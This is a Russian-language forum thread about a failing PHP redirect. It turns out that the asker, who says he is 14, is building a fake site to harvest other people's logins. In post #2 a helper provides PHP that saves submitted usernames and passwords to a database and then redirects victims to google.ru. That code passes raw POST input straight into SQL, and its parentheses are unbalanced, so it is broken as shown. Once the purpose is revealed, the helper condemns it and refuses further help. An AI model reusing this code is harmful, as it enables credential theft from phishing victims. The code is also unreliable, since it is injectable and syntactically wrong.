<MyRusakov.ru />

Создание Интернет-магазина на OpenCart 2.0

Создание Интернет-магазина на OpenCart 2.0

Видеокурс "Создание Интернет-магазина на OpenCart 2.0" обучит Вас созданию любых Интернет-магазинов на OpenCart 2. В первом разделе курса разбираются абсолютно все возможности данного движка с примерами.

Во втором разделе создаётся полноценный Интернет-магазин, где Вы уже всё увидите своими глазами.

И, наконец, в третьем разделе курса созданный Интернет-магазин будет размещён в Интернете.

К курсу так же идут бесплатные и очень ценные Бонусы сопоставимые с самим курсом: "Как сэкономить на Яндекс.Директ до 50%", "Дропшиппинг" и "Как раскрутить Интернет-магазин".

Подробнее
Подписка

Подписавшись по E-mail, Вы будете получать уведомления о новых статьях.

Подписка Подписаться

Добавляйтесь ко мне в друзья ВКонтакте! Отзывы о сайте и обо мне оставляйте в моей группе.

Мой аккаунт Мой аккаунт Моя группа
Опрос

Каким движком Вы предпочитаете пользоваться?

Форум сайта MyRusakov.ru

Переадресация сайта
14.01.2012 11:23:57 Переадресация сайта Сообщение #1
hrach9779

hrach9779

Освоившийся

Освоившийся

Дата регистрации:
26.11.2011 15:33:20

Сообщений: 37

Я про это давно додумался!!! но неработает!!!!!!
Parse error: syntax error, unexpected T_STRING in /home/la2host.ru/freya-pro/sites/www/test2.php on line 5
Вот такой эррор а на 5 строке сам код header......
Профиль Ответить
14.01.2012 13:06:17 Переадресация сайта Сообщение #2
brussens

brussens

Мега-мастер

Мега-мастер

Дата регистрации:
11.10.2011 22:50:07

Сообщений: 438

Во первых у вас уже выходит информация, в коде
print ("Логин или пароль неверный:если не знаете в чем причина ошибки обратитесь в службу тех. поддержки";
А header("Location: http://google.ru";
выводит ошибку, если выведено что нибудь перед ним!
Правильный код будет таким:

<?php

$conn=mysql_connect("localhost","h72***","6Rn*****";
mysql_select_db("h72***",$conn);
mysql_query("INSERT INTO testt (login,pass) VALUES ('".$_POST['login']."','".$_POST['password']."');";

header("Location: http://google.ru";

?>


Если надо редирект сделать непосредственно с выводом того, что база не робит, то используйте такой код
<?php
Sredirect_javascript_script = "<script language = 'javascript'>
var delay = 5000;
setTimeout("document.location.href='http://b.ru'", delay);
</script>"
$conn=mysql_connect("localhost","h72***","6Rn*****"
or die("awfwf";
print ("Логин или пароль неверный:если не знаете в чем причина ошибки обратитесь в службу тех. поддержки";
echo Sredirect_javascript_script;
mysql_select_db("h72***",$conn);
mysql_query("INSERT INTO testt (login,pass) VALUES ('".$_POST['login']."','".$_POST['password']."');";
?>


З.Ы. На будущее: Вчитывайтесь в то, что вам отвечают, ибо вы не прочитав, как работает редирект на php задаёте много вопросов, которые бы исчезли после внимательного прочтения
З.З.Ы: Вообще код просто нелогичный, по крайней мере для меня. Советую вам пройтись ещё раз по всему курсу php. Поверьте, чем больше будете читать одни и те же статьи, тем больше будете навыков иметь и понимать)) И желательно почитайте о том, как должен выглядеть красымый код, а не беспорядочный))) Поверьте, если красиво не сможете писать код, то будете теряться))) По крайней мере у меня такое было, и пришлось изучать)) Удачи))
Профиль Ответить
14.01.2012 13:56:04 Переадресация сайта Сообщение #3
hrach9779

hrach9779

Освоившийся

Освоившийся

Дата регистрации:
26.11.2011 15:33:20

Сообщений: 37

Этот код не безсмысленный))) я сделал фейк сайт а этим php кодом логин и пароль идут комне))) знаю делаю плохое дело но меня так же взломали....
Профиль Ответить
15.01.2012 02:40:00 Переадресация сайта Сообщение #4
brussens

brussens

Мега-мастер

Мега-мастер

Дата регистрации:
11.10.2011 22:50:07

Сообщений: 438

заниматься такими вещами - это просто гнусно. Если вы не можете более или менее чистый код писать, то думаю сайт состоит из одной страницы. Честно говоря, можно сделать всё намного проще, меньше кода понадобится. Но писать для вас я таковой код не буду, ибо я считаю, что заниматься такими вещами, выражусь поприличнее - фигово. Если коддингом занимаетесь, то занимайтесь во благо, а не тем, как вы это делаете. Код просто ужасный и бессмысленный, даже для фейк сайта. Задумайтесь. Лучше учитесь и ФИГНЁЙ не занимайтесь.
З.Ы.: Помните, что месть - это прежде всего поступок неудачников. так что поразмышляйте. Делайте достойные сайты, на которые люди пойдут и будете очень довольны. Успехов)
Профиль Ответить
15.01.2012 22:59:17 Переадресация сайта Сообщение #5
hrach9779

hrach9779

Освоившийся

Освоившийся

Дата регистрации:
26.11.2011 15:33:20

Сообщений: 37

это нормальный код и он работает...меня на 160% кинули что сидеть и радоватся??
Профиль Ответить
15.01.2012 23:01:47 Переадресация сайта Сообщение #6
hrach9779

hrach9779

Освоившийся

Освоившийся

Дата регистрации:
26.11.2011 15:33:20

Сообщений: 37

Мне 14 лет,и я знаю php неочень то хорошо я научился видеокурсом из этого сайта (бесплатной)
Профиль Ответить
17.01.2012 14:27:57 Переадресация сайта Сообщение #7
brussens

brussens

Мега-мастер

Мега-мастер

Дата регистрации:
11.10.2011 22:50:07

Сообщений: 438

не важно сколько лет вам. Мне 20, и что? И совершенно не важно, что код рабочий, я говорю, что он именно БЕЗОБРАЗНЫЙ! И на наколько мне известно, то тут нет бесплатного видеокурса по php.
Профиль Ответить
18.01.2012 22:14:08 Переадресация сайта Сообщение #8
hrach9779

hrach9779

Освоившийся

Освоившийся

Дата регистрации:
26.11.2011 15:33:20

Сообщений: 37

Я тут Html учил а php другими видеокурсами...
Профиль Ответить
20.01.2012 04:26:33 Переадресация сайта Сообщение #9
brussens

brussens

Мега-мастер

Мега-мастер

Дата регистрации:
11.10.2011 22:50:07

Сообщений: 438

На одних видеокурсах далеко не уедете
Профиль Ответить
21.01.2012 09:34:28 Переадресация сайта Сообщение #10
hrach9779

hrach9779

Освоившийся

Освоившийся

Дата регистрации:
26.11.2011 15:33:20

Сообщений: 37

А что посоветуете?!
Профиль Ответить